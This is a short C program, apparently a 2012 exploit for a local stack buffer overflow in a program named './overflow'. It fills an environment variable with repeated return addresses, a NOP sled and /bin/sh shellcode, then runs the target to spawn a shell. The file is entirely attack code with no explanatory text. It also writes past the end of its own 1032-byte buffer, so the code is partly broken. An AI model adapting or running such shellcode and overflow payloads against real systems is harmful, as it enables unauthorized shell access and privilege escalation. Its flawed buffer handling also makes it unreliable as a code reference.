exploit.c


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

/*
 * main.c
 *
 *  Created on: 27.01.2012
 *      Author: druid
 */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <string.h>

#define PATH_CT "./overflow"
#define ENV_VAR "EXPLOIT"
#define NOP 0x90


static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

u_long
esp()
{
  __asm__("movl %esp, %eax");
}

int
main()
{

  u_char buf[1032];
  u_long addr;
  int i;

  strcpy(buf, "/usr/bin/pico;   ");

  addr = esp() - 192;
  for (i = 16; i < 128 + 16; i += 4)
    *((u_long *) (buf + i)) = addr;
  for (i = 128 + 16; i < 1040; i++)
    buf[i] = 0x90;
  for (i = 0; i < strlen(shellcode); i++)
    buf[1040 + i] = shellcode[i];
  buf[1040 + i] = '\n';

  setenv(ENV_VAR, buf, 1);
  execl(PATH_CT, "overflow", (char *) 0);
}